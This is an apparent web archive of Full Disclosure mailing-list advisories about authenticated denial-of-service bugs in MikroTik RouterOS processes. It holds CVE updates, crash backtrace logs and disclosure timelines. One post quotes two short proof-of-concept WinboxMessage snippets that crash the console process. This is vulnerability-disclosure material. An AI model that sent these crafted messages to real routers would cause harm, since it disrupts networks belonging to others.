> 2020.06.04-15:48:13.77@0: 776be000-776f3000 r-xp  00:0c 964
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.04-15:48:13.77@0: 776f7000-77711000 r-xp  

Re: [FD] Two vulnerabilities found in MikroTik's RouterOS

2021-05-07 Thread Q C
[Update 2021/05/05] Two CVEs have been assigned to these vulnerabilities.

CVE-2020-20267: Mikrotik RouterOs before 6.47 (stable tree) suffers from a
memory corruption vulnerability in the /nova/bin/resolver process. An
authenticated remote attacker can cause a Denial of Service due to invalid
memory access.

CVE-2020-20225: Mikrotik RouterOs before 6.47 (stable tree) suffers from an
assertion failure vulnerability in the /nova/bin/user process. An
authenticated remote attacker can cause a Denial of Service due to an
assertion failure via a crafted packet.


On Wed, Sep 9, 2020 at 9:02 PM Q C wrote:

> Advisory: two vulnerabilities found in MikroTik's RouterOS
>
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen (@cq674350529) of Qihoo 360 Nirvan Team
>
>
> Product Description
> ==
>
> RouterOS is the operating system used on MikroTik's devices, such as
> switches, routers and access points.
>
>
> Description of vulnerabilities
> ==
>
> 1. memory corruption
> The resolver process suffers from a memory corruption vulnerability. By
> sending a crafted packet, an authenticated remote user can crash the
> resolver process due to invalid memory access.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.18-14:38:03.27@0:
> 2020.06.18-14:38:03.27@0:
> 2020.06.18-14:38:03.28@0: /nova/bin/resolver
> 2020.06.18-14:38:03.28@0: --- signal=11
> 
> 2020.06.18-14:38:03.28@0:
> 2020.06.18-14:38:03.28@0: eip=0x080508f6 eflags=0x00010206
> 2020.06.18-14:38:03.28@0: edi=0x08060620 esi=0x08062018
> ebp=0x7fe5fd08 esp=0x7fe5fcc0
> 2020.06.18-14:38:03.28@0: eax=0x000c ebx=0x08061c98
> ecx=0x77676f00 edx=0x0005
> 2020.06.18-14:38:03.28@0:
> 2020.06.18-14:38:03.28@0: maps:
> 2020.06.18-14:38:03.28@0: 08048000-0805c000 r-xp  00:0c 995
>  /nova/bin/resolver
> 2020.06.18-14:38:03.28@0: 7763f000-77674000 r-xp  00:0c 964
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.18-14:38:03.28@0: 77678000-77692000 r-xp  00:0c 960
>  /lib/libgcc_s.so.1
> 2020.06.18-14:38:03.28@0: 77693000-776a2000 r-xp  00:0c 944
>  /lib/libuc++.so
> 2020.06.18-14:38:03.28@0: 776a3000-776ab000 r-xp  00:0c 950
>  /lib/libubox.so
> 2020.06.18-14:38:03.28@0: 776ac000-776f8000 r-xp  00:0c 946
>  /lib/libumsg.so
> 2020.06.18-14:38:03.28@0: 776fe000-77705000 r-xp  00:0c 958
>  /lib/ld-uClibc-0.9.33.2.so
> 2020.06.18-14:38:03.28@0:
> 2020.06.18-14:38:03.28@0: stack: 0x7fe6 - 0x7fe5fcc0
> 2020.06.18-14:38:03.28@0: 03 00 00 00 e4 8a 6f 77 38 fd e5 7f e4 fc
> e5 7f c0 dc 05 08 5c 03 e6 7f 08 fd e5 7f 1f e7 04 08
> 2020.06.18-14:38:03.28@0: 58 21 06 08 48 06 06 08 f8 1f 06 08 c0 0c
> 00 00 1c fd e5 7f 28 c7 05 08 02 fb 6f 77 98 1c 06 08
> 2020.06.18-14:38:03.28@0:
> 2020.06.18-14:38:03.28@0: code: 0x80508f6
> 2020.06.18-14:38:03.28@0: 88 10 8b 43 14 40 89 43 14 8b 55 dc 8d 72
> 04 8b
>
> This vulnerability was initially found in long-term 6.44.6, and was fixed
> in stable 6.47.
>
> 2. reachable assertion failure
> The user process suffers from an assertion failure vulnerability. There is
> a reachable assertion in the user process. By sending a crafted packet, an
> authenticated remote user can crash the user process due to assertion
> failure.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-17:56:52.31@0:
> 2020.06.04-17:56:52.31@0:
> 2020.06.04-17:56:52.31@0: /nova/bin/user
> 2020.06.04-17:56:52.31@0: --- signal=6
> 
> 2020.06.04-17:56:52.31@0:
> 2020.06.04-17:56:52.31@0: eip=0x7765a55b eflags=0x0246
> 2020.06.04-17:56:52.31@0: edi=0x00fe0001 esi=0x77662200
> ebp=0x7fee3790 esp=0x7fee3788
> 2020.06.04-17:56:52.31@0: eax=0x ebx=0x00b4
> ecx=0x00b4 edx=0x0006
> 2020.06.04-17:56:52.31@0:
> 2020.06.04-17:56:52.31@0: maps:
> 2020.06.04-17:56:52.31@0: 08048000-08059000 r-xp  00:0c 1002
>   /nova/bin/user
> 2020.06.04-17:56:52.31@0: 7762c000-77661000 r-xp  00:0c 964
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.04-17:56:52.31@0: 77665000-7767f000 r-xp  00:0c 960
>  /lib/libgcc_s.so.1
> 2020.06.04-17:56:52.31@0: 7768-7768f000 r-xp  00:0c 944
>  /lib/libuc++.so
> 2020.06.04-17:56:52.31@0: 7769-776ad000 r

Re: [FD] Three vulnerabilities found in MikroTik's RouterOS

2021-05-07 Thread Q C
[Update 2021/05/04] Three CVEs have been assigned to these vulnerabilities.

CVE-2020-20266: Mikrotik RouterOs before 6.47 (stable tree) suffers from a
memory corruption vulnerability in the /nova/bin/dot1x process. An
authenticated remote attacker can cause a Denial of Service (NULL pointer
dereference).

CVE-2020-20264: Mikrotik RouterOs before 6.47 (stable tree) suffers from a
divide by zero vulnerability in the /ram/pckg/advanced-tools/nova/bin/netwatch
process. An authenticated remote attacker can cause a Denial of Service due
to a divide by zero error.

CVE-2020-20265: Mikrotik RouterOs before 6.47 (stable tree) suffers from a
memory corruption vulnerability in the /ram/pckg/wireless/nova/bin/wireless
process. An authenticated remote attacker can cause a Denial of Service via
a crafted packet.





On Thu, Aug 27, 2020 at 7:16 PM Q C wrote:

> Advisory: three vulnerabilities found in MikroTik's RouterOS
>
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen (@cq674350529) of Qihoo 360 Nirvan Team
>
>
> Product Description
> ==
>
> RouterOS is the operating system used on MikroTik's devices, such as
> switches, routers and access points.
>
>
> Description of vulnerabilities
> ==
>
> 1. NULL pointer dereference
> The dot1x process suffers from a memory corruption vulnerability. By
> sending a crafted packet, an authenticated remote user can crash the dot1x
> process due to NULL pointer dereference.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-14:51:29.47@0:
> 2020.06.04-14:51:29.47@0:
> 2020.06.04-14:51:29.81@0: /nova/bin/dot1x
> 2020.06.04-14:51:29.81@0: --- signal=11
> 
> 2020.06.04-14:51:29.81@0:
> 2020.06.04-14:51:29.81@0: eip=0x776a51e5 eflags=0x00010202
> 2020.06.04-14:51:29.81@0: edi=0x7fc51064 esi=0x08062ed0
> ebp=0x7fc50f78 esp=0x7fc50f6c
> 2020.06.04-14:51:29.81@0: eax=0x ebx=0x776ad4ec
> ecx=0x edx=0x08062e28
> 2020.06.04-14:51:29.81@0:
> 2020.06.04-14:51:29.81@0: maps:
> 2020.06.04-14:51:29.81@0: 08048000-0805f000 r-xp  00:0c 1064
>   /nova/bin/dot1x
> 2020.06.04-14:51:29.81@0: 7764a000-7767f000 r-xp  00:0c 964
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.04-14:51:29.81@0: 77683000-7769d000 r-xp  00:0c 960
>  /lib/libgcc_s.so.1
> 2020.06.04-14:51:29.81@0: 7769e000-776ad000 r-xp  00:0c 944
>  /lib/libuc++.so
> 2020.06.04-14:51:29.81@0: 776ae000-776b4000 r-xp  00:0c 951
>  /lib/liburadius.so
> 2020.06.04-14:51:29.81@0: 776b5000-776bd000 r-xp  00:0c 950
>  /lib/libubox.so
> 2020.06.04-14:51:29.81@0: 776be000-776db000 r-xp  00:0c 947
>  /lib/libucrypto.so
> 2020.06.04-14:51:29.81@0: 776dc000-77728000 r-xp  00:0c 946
>  /lib/libumsg.so
> 2020.06.04-14:51:29.81@0: 7772e000-77735000 r-xp  00:0c 958
>  /lib/ld-uClibc-0.9.33.2.so
> 2020.06.04-14:51:29.81@0:
> 2020.06.04-14:51:29.81@0: stack: 0x7fc52000 - 0x7fc50f6c
> 2020.06.04-14:51:29.81@0: 00 00 00 00 90 27 06 08 e4 8a 72 77 a8 0f
> c5 7f 2e be 6f 77 90 27 06 08 d0 2e 06 08 28 2e 06 08
> 2020.06.04-14:51:29.81@0: 28 2e 06 08 a4 0f c5 7f f0 da 6b 77 05 00
> 00 00 f0 da 6b 77 e0 2d 06 08 64 10 c5 7f e8 0f c5 7f
> 2020.06.04-14:51:29.81@0:
> 2020.06.04-14:51:29.81@0: code: 0x776a51e5
> 2020.06.04-14:51:29.81@0: 8b 10 01 c2 83 c2 04 52 83 c0 04 50 ff 75
> 08 e8
>
> This vulnerability was initially found in stable 6.46.3, and was fixed in
> stable 6.47.
>
> 2. division by zero
> The netwatch process suffers from a division-by-zero vulnerability. By
> sending a crafted packet, an authenticated remote user can crash the
> netwatch process due to arithmetic exception.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-16:25:57.65@0:
> 2020.06.04-16:25:57.65@0:
> 2020.06.04-16:25:57.65@0: /ram/pckg/advanced-tools/nova/bin/netwatch
> 2020.06.04-16:25:57.65@0: --- signal=8
> 
> 2020.06.04-16:25:57.65@0:
> 2020.06.04-16:25:57.65@0: eip=0x0804c6d7 eflags=0x00010246
> 2020.06.04-16:25:57.65@0: edi=0x5ed9208c esi=0x
> ebp=0x73f8 esp=0x73b0
> 2020.06.04-16:25:57.65@0: eax=0x ebx=0x08051020
> ecx=0x edx=0x
> 2020.06.04-16:25:57.65@0:
> 2020.06.04-16:25:57.65@0: maps:
> 2020.06.04-16:25:57.65@0: 08048000-0804d000 r-xp  00:1a 14
>   /ra

Re: [FD] Three vulnerabilities found in MikroTik's RouterOS

2021-05-07 Thread Q C
[update 2021/05/04] Three CVEs have been assigned to these vulnerabilities.

CVE-2020-20215: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a
memory corruption vulnerability in the /nova/bin/diskd process. An
authenticated remote attacker can cause a Denial of Service due to invalid
memory access.

CVE-2020-20216: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a
memory corruption vulnerability in the /nova/bin/graphing process. An
authenticated remote attacker can cause a Denial of Service (NULL pointer
dereference).

CVE-2020-20213: Mikrotik RouterOs 6.44.5 (long-term tree) suffers from a
stack exhaustion vulnerability in the /nova/bin/net process. An
authenticated remote attacker can cause a Denial of Service due to
overloading the system's CPU.



Q C  于2020年7月22日周三 下午8:11写道:

> Advisory: three vulnerabilities found in MikroTik's RouterOS
>
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
>
> Product Description
> ==
>
> RouterOS is the operating system used on MikroTik's devices, such as
> switches, routers and access points.
>
>
> Description of vulnerabilities
> ==
>
> 1. Memory corruption vulnerability
> The diskd process suffers from a memory corruption vulnerability. By
> sending a crafted packet, an authenticated remote user can crash the diskd
> process due to invalid memory access.
>
> Against stable 6.44.3, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-14:18:22.55@0:
> 2020.06.04-14:18:22.55@0:
> 2020.06.04-14:18:22.55@0: /nova/bin/diskd
> 2020.06.04-14:18:22.55@0: --- signal=11
> 
> 2020.06.04-14:18:22.55@0:
> 2020.06.04-14:18:22.55@0: eip=0x776cd1db eflags=0x00010202
> 2020.06.04-14:18:22.55@0: edi=0x08056760 esi=0x08056790
> ebp=0x7fd40b78 esp=0x7fd40b6c
> 2020.06.04-14:18:22.55@0: eax=0x001b ebx=0x776d54ec
> ecx=0x776d54ec edx=0x20fe0010
> 2020.06.04-14:18:22.55@0:
> 2020.06.04-14:18:22.55@0: maps:
> 2020.06.04-14:18:22.55@0: 08048000-08052000 r-xp  00:0c 1131
>   /nova/bin/diskd
> 2020.06.04-14:18:22.55@0: 77672000-776a7000 r-xp  00:0c 996
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.04-14:18:22.55@0: 776ab000-776c5000 r-xp  00:0c 992
>  /lib/libgcc_s.so.1
> 2020.06.04-14:18:22.55@0: 776c6000-776d5000 r-xp  00:0c 976
>  /lib/libuc++.so
> 2020.06.04-14:18:22.55@0: 776d6000-776de000 r-xp  00:0c 982
>  /lib/libubox.so
> 2020.06.04-14:18:22.55@0: 776df000-7772b000 r-xp  00:0c 978
>  /lib/libumsg.so
> 2020.06.04-14:18:22.55@0: 77731000-77738000 r-xp  00:0c 990
>  /lib/ld-uClibc-0.9.33.2.so
> 2020.06.04-14:18:22.55@0:
> 2020.06.04-14:18:22.55@0: stack: 0x7fd41000 - 0x7fd40b6c
> 2020.06.04-14:18:22.55@0: ec 54 6d 77 1b 00 00 00 88 67 05 08 98 0b
> d4 7f c6 c6 04 08 88 67 05 08 1b 00 00 00 10 00 fe 20
> 2020.06.04-14:18:22.55@0: 10 00 fe 20 ec 54 6d 77 f0 ea 6d 77 08 0c
> d4 7f 6d a9 6d 77 88 67 05 08 1b 00 00 00 05 00 00 00
> 2020.06.04-14:18:22.55@0:
> 2020.06.04-14:18:22.55@0: code: 0x776cd1db
> 2020.06.04-14:18:22.55@0: 8b 00 8b 10 01 c2 83 c2 04 52 83 c0 04 50
> ff 75
>
> This vulnerability was initially found in long-term 6.44.5, and has been
> fixed in stable 6.47.
>
> 2. NULL pointer dereference vulnerability
> The graphing process suffers from a memory corruption vulnerability. By
> sending a crafted packet, an authenticated remote user can crash the
> graphing process due to NULL
> pointer dereference.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-15:12:41.47@0:
> 2020.06.04-15:12:41.47@0:
> 2020.06.04-15:12:41.47@0: /nova/bin/graphing
> 2020.06.04-15:12:41.47@0: --- signal=11
> 
> 2020.06.04-15:12:41.47@0:
> 2020.06.04-15:12:41.47@0: eip=0x080521e2 eflags=0x00010202
> 2020.06.04-15:12:41.47@0: edi=0x080610a0 esi=0x08061cb8
> ebp=0x7fa8acd8 esp=0x7fa8acb0
> 2020.06.04-15:12:41.47@0: eax=0x08061db8 ebx=0x7fa8ad0c
> ecx=0x edx=0x08061ce8
> 2020.06.04-15:12:41.47@0:
> 2020.06.04-15:12:41.47@0: maps:
> 2020.06.04-15:12:41.47@0: 08048000-0805c000 r-xp  00:0c 1038
>   /nova/bin/graphing
> 2020.06.04-15:12:41.47@0: 77651000-77686000 r-xp  00:0c 964
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.04-15:12:41.47@0: 7768a000-776a4000 r

Re: [FD] Two vulnerabilities found in MikroTik's RouterOS

2021-05-04 Thread Q C
[Update 2021/05/04] Two CVEs have been assigned to these vulnerabilities.

CVE-2020-20219: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a
memory corruption vulnerability in the /nova/bin/igmp-proxy process. An
authenticated remote attacker can cause a Denial of Service (NULL pointer
dereference).

CVE-2020-20262: Mikrotik RouterOs before 6.47 (stable tree) suffers from an
assertion failure vulnerability in the /ram/pckg/security/nova/bin/ipsec
process. An authenticated remote attacker can cause a Denial of Service due
to an assertion failure via a crafted packet.



Q C  于2020年8月13日周四 下午7:14写道:

> Advisory: two vulnerabilities found in MikroTik's RouterOS
>
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
>
> Product Description
> ==
>
> RouterOS is the operating system used on MikroTik's devices, such as
> switches, routers and access points.
>
>
> Description of vulnerabilities
> ==
>
> 1. NULL pointer dereference
> The igmpproxy process suffers from a memory corruption vulnerability. By
> sending a crafted packet, an authenticated remote user can crash the
> igmpproxy process due to NULL pointer dereference.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0: /ram/pckg/multicast/nova/bin/igmpproxy
> 2020.06.04-17:44:27.12@0: --- signal=11
> 
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0: eip=0x08050a8d eflags=0x00010206
> 2020.06.04-17:44:27.12@0: edi=0x7fa9331c esi=0x7fa932b8
> ebp=0x7fa932a8 esp=0x7fa9326c
> 2020.06.04-17:44:27.12@0: eax=0x080581bc ebx=0x
> ecx=0x000b edx=0x
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0: maps:
> 2020.06.04-17:44:27.12@0: 08048000-08053000 r-xp  00:13 16
>   /ram/pckg/multicast/nova/bin/igmpproxy
> 2020.06.04-17:44:27.12@0: 7770b000-7774 r-xp  00:0c 964
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.04-17:44:27.12@0: 77744000-7775e000 r-xp  00:0c 960
>  /lib/libgcc_s.so.1
> 2020.06.04-17:44:27.12@0: 7775f000-7776e000 r-xp  00:0c 944
>  /lib/libuc++.so
> 2020.06.04-17:44:27.12@0: 7776f000-7000 r-xp  00:0c 950
>  /lib/libubox.so
> 2020.06.04-17:44:27.12@0: 8000-777c4000 r-xp  00:0c 946
>  /lib/libumsg.so
> 2020.06.04-17:44:27.12@0: 777ca000-777d1000 r-xp  00:0c 958
>  /lib/ld-uClibc-0.9.33.2.so
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0: stack: 0x7fa94000 - 0x7fa9326c
> 2020.06.04-17:44:27.12@0: 01 00 00 00 e8 7f 05 08 10 00 00 00 98 32
> a9 7f 11 00 00 00 78 57 05 08 14 33 a9 7f a8 32 a9 7f
> 2020.06.04-17:44:27.12@0: 67 29 79 77 04 5d 05 08 6c 25 79 77 d8 32
> a9 7f e0 57 05 08 b8 32 a9 7f 1c 33 a9 7f d8 32 a9 7f
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0: code: 0x8050a8d
> 2020.06.04-17:44:27.12@0: 8b 03 ff 30 6a 01 56 e8 77 a8 ff ff 83 c4
> 0c 0f
>
> This vulnerability was initially found in long-term 6.44.6, and was fixed
> in stable 6.47.
>
> 2. reachable assertion failure
> The ipsec process suffers from an assertion failure vulnerability. There
> is a reachable assertion in the ipsec process. By sending a crafted packet,
> an authenticated remote user can crash the ipsec process due to assertion
> failure.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-18:25:16.04@0:
> 2020.06.04-18:25:16.04@0:
> 2020.06.04-18:25:16.04@0: /ram/pckg/security/nova/bin/ipsec
> 2020.06.04-18:25:16.04@0: --- signal=6
> 
> 2020.06.04-18:25:16.04@0:
> 2020.06.04-18:25:16.04@0: eip=0x7748155b eflags=0x0246
> 2020.06.04-18:25:16.04@0: edi=0x0001 esi=0x77489200
> ebp=0x7f8fa450 esp=0x7f8fa448
> 2020.06.04-18:25:16.04@0: eax=0x ebx=0x0291
> ecx=0x0291 edx=0x0006
> 2020.06.04-18:25:16.04@0:
> 2020.06.04-18:25:16.04@0: maps:
> 2020.06.04-18:25:16.04@0: 08048000-080b5000 r-xp  00:11 42
>   /ram/pckg/security/nova/bin/ipsec
> 2020.06.04-18:25:16.04@0: 77453000-77488000 r-xp  00:0c 964
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.04-18:25:16.04@0: 7748c000-774a6000 r-xp  00:0c 960
>  /lib/libgcc_s.so.1
> 2020.06.04-18:25:16.04@0: 774a7000

Re: [FD] Two vulnerabilities found in MikroTik's RouterOS

2021-05-04 Thread Q C
[Update 2021/05/04] Two CVEs have been assigned to these vulnerabilities.

CVE-2020-20221: Mikrotik RouterOs before 6.44.6 (long-term tree) suffers
from an uncontrolled resource consumption vulnerability in the
/nova/bin/cerm process. An authenticated remote attacker can cause a Denial
of Service due to overloading the system's CPU.

CVE-2020-20218: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a
memory corruption vulnerability in the /nova/bin/traceroute process. An
authenticated remote attacker can cause a Denial of Service via the
loop counter variable.



Q C  于2020年5月10日周日 上午10:41写道:

> Advisory: two vulnerabilities found in MikroTik's RouterOS
>
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Affected Versions: until stable 6.45.7 (first vulnerability), until stable
> 6.46.4 (second vulnerability)
> Fixed Versions: stable 6.46.x (first vulnerability), stable 6.46.5 (second
> vulnerability)
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
>
> Product Description
> ==
>
> RouterOS is the operating system used on MikroTik's devices, such as
> switches, routers and access points.
>
>
> Description of vulnerabilities
> ==
>
> These two vulnerabilities were tested only against the MikroTik RouterOS
> stable release tree when found. Maybe other release trees also suffer from
> these vulnerabilities.
>
> 1. The cerm process suffers from an uncontrolled resource consumption
> issue. By sending a crafted packet, an authenticated remote user can cause
> a high CPU load, which may make the device respond slowly or be unable to
> respond.
>
> 2. The traceroute process suffers from a memory corruption issue. By
> sending a crafted packet, an authenticated remote user can crash the
> traceroute process due to invalid memory access.
>
>
> Solution
> 
>
> Upgrade to the corresponding latest RouterOS tree version.
>
>
> References
> ==
>
> [1] https://mikrotik.com/download/changelogs/stable-release-tree
>
>

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] Two vulnerabilities found in MikroTik's RouterOS

2021-05-04 Thread Q C
[Update 2021/05/04] CVE-2020-20212 and CVE-2020-20211 have been
assigned to these two vulnerabilities.


CVE-2020-20212: Mikrotik RouterOs 6.44.5 (long-term tree) suffers from
a memory corruption vulnerability in the /nova/bin/console process. An
authenticated remote attacker can cause a Denial of Service (NULL
pointer dereference).


CVE-2020-20211: Mikrotik RouterOs 6.44.5 (long-term tree) suffers from
an assertion failure vulnerability in the /nova/bin/console process.
An authenticated remote attacker can cause a Denial of Service due to
an assertion failure via a crafted packet.





Q C  于2020年4月14日周二 下午6:29写道:

> [Update 2020/04/14] The latest stable release tree 6.46.5 still suffers
> from these two vulnerabilities.
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Affected Versions: through 6.46.5 (stable release tree)
> Fixed Versions: -
> Vendor URL: https://mikrotik.com/
> Vendor Status: not fixed yet
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
> Poc
> ===
> The following PoCs are based on the tool routeros
> (https://github.com/tenable/routeros)
>
> 1) memory corruption in console process
>
> WinboxMessage msg;
> msg.set_to(48, 4);
> msg.set_command(0xfe0005);
> msg.add_u32(0xfe000c, -1);
> msg.add_u32(9, 9);
>
> 2) assertion failure in console process
>
> WinboxMessage msg;
> msg.set_to(48, 4);
> msg.set_command(0xfe0005);
> msg.add_u32(0xfe0001, 0);
>
> Disclosure timeline
> ===
> 2019/08/23  reported the 2nd issue to the vendor
> 2019/08/26  reported the 1st issue to the vendor
> 2019/08/28  vendor reproduced the 1st issue and will fix it as soon as
> possible
> 2019/08/30  vendor reproduced the 2nd issue and will fix it as soon as
> possible
> 2019/12/02  notified the vendor the 1st issue still exists in version
> 6.44.6 (2nd issue fixed)
> 2020/01/06  no response from the vendor, and did the initial disclosure
> 2020/04/14  re-tested these two issues against the stable 6.46.5, and
> updated the disclosure
>
>
>
> Q C  于2020年1月6日周一 下午7:32写道:
>
>> Advisory: two vulnerabilities found in MikroTik's RouterOS
>>
>>
>> Details
>> ===
>>
>> Product: MikroTik's RouterOS
>> Affected Versions: before 6.44.6 (Long-term release tree)
>> Fixed Versions: 6.44.6 (Long-term release tree)
>> Vendor URL: https://mikrotik.com/
>> Vendor Status: fixed version released
>> CVE: -
>> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>>
>>
>> Product Description
>> ==
>>
>> RouterOS is the operating system used on MikroTik's devices, such as
>> switches, routers and access points.
>>
>>
>> Description of vulnerabilities
>> ==
>>
>> These two vulnerabilities were tested only against the MikroTik RouterOS
>> long-term release tree when found. Maybe other release trees also suffer
>> from these issues.
>>
>> 1. The console process suffers from a memory corruption issue.
>> An authenticated remote user can crash the console process due to a NULL
>> pointer dereference by sending a crafted packet.
>>
>> 2. The console process suffers from an assertion failure issue. There is
>> a reachable assertion in the console process. An authenticated remote user
>> can crash the console process due to assertion failure by sending a crafted
>> packet.
>>
>> Solution
>> 
>>
>> Upgrade to the corresponding latest RouterOS tree version.
>>
>>
>> References
>> ==
>>
>> [1] https://mikrotik.com/download/changelogs/long-term-release-tree
>>
>


[FD] Two vulnerabilities found in MikroTik's RouterOS

2020-09-11 Thread Q C
Advisory: two vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on MikroTik's devices, such as
switches, routers and access points.


Description of vulnerabilities
==

1. memory corruption
The resolver process suffers from a memory corruption vulnerability. By
sending a crafted packet, an authenticated remote user can crash the
resolver process due to invalid memory access.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.18-14:38:03.27@0:
2020.06.18-14:38:03.27@0:
2020.06.18-14:38:03.28@0: /nova/bin/resolver
2020.06.18-14:38:03.28@0: --- signal=11

2020.06.18-14:38:03.28@0:
2020.06.18-14:38:03.28@0: eip=0x080508f6 eflags=0x00010206
2020.06.18-14:38:03.28@0: edi=0x08060620 esi=0x08062018 ebp=0x7fe5fd08
esp=0x7fe5fcc0
2020.06.18-14:38:03.28@0: eax=0x000c ebx=0x08061c98 ecx=0x77676f00
edx=0x0005
2020.06.18-14:38:03.28@0:
2020.06.18-14:38:03.28@0: maps:
2020.06.18-14:38:03.28@0: 08048000-0805c000 r-xp  00:0c 995
   /nova/bin/resolver
2020.06.18-14:38:03.28@0: 7763f000-77674000 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.18-14:38:03.28@0: 77678000-77692000 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.18-14:38:03.28@0: 77693000-776a2000 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.18-14:38:03.28@0: 776a3000-776ab000 r-xp  00:0c 950
   /lib/libubox.so
2020.06.18-14:38:03.28@0: 776ac000-776f8000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.18-14:38:03.28@0: 776fe000-77705000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.18-14:38:03.28@0:
2020.06.18-14:38:03.28@0: stack: 0x7fe6 - 0x7fe5fcc0
2020.06.18-14:38:03.28@0: 03 00 00 00 e4 8a 6f 77 38 fd e5 7f e4 fc e5
7f c0 dc 05 08 5c 03 e6 7f 08 fd e5 7f 1f e7 04 08
2020.06.18-14:38:03.28@0: 58 21 06 08 48 06 06 08 f8 1f 06 08 c0 0c 00
00 1c fd e5 7f 28 c7 05 08 02 fb 6f 77 98 1c 06 08
2020.06.18-14:38:03.28@0:
2020.06.18-14:38:03.28@0: code: 0x80508f6
2020.06.18-14:38:03.28@0: 88 10 8b 43 14 40 89 43 14 8b 55 dc 8d 72 04
8b

This vulnerability was initially found in long-term 6.44.6, and was fixed
in stable 6.47.

2. reachable assertion failure
The user process suffers from an assertion failure vulnerability. There is
a reachable assertion in the user process. By sending a crafted packet, an
authenticated remote user can crash the user process due to assertion
failure.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: /nova/bin/user
2020.06.04-17:56:52.31@0: --- signal=6

2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: eip=0x7765a55b eflags=0x0246
2020.06.04-17:56:52.31@0: edi=0x00fe0001 esi=0x77662200 ebp=0x7fee3790
esp=0x7fee3788
2020.06.04-17:56:52.31@0: eax=0x ebx=0x00b4 ecx=0x00b4
edx=0x0006
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: maps:
2020.06.04-17:56:52.31@0: 08048000-08059000 r-xp  00:0c 1002
/nova/bin/user
2020.06.04-17:56:52.31@0: 7762c000-77661000 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.04-17:56:52.31@0: 77665000-7767f000 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.04-17:56:52.31@0: 7768-7768f000 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.04-17:56:52.31@0: 7769-776ad000 r-xp  00:0c 947
   /lib/libucrypto.so
2020.06.04-17:56:52.31@0: 776ae000-776b4000 r-xp  00:0c 951
   /lib/liburadius.so
2020.06.04-17:56:52.31@0: 776b5000-776bd000 r-xp  00:0c 950
   /lib/libubox.so
2020.06.04-17:56:52.31@0: 776be000-776c1000 r-xp  00:0c 948
   /lib/libuxml++.so
2020.06.04-17:56:52.31@0: 776c2000-7770e000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.04-17:56:52.31@0: 77714000-7771b000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: stack: 0x7fee4000 - 0x7fee3788
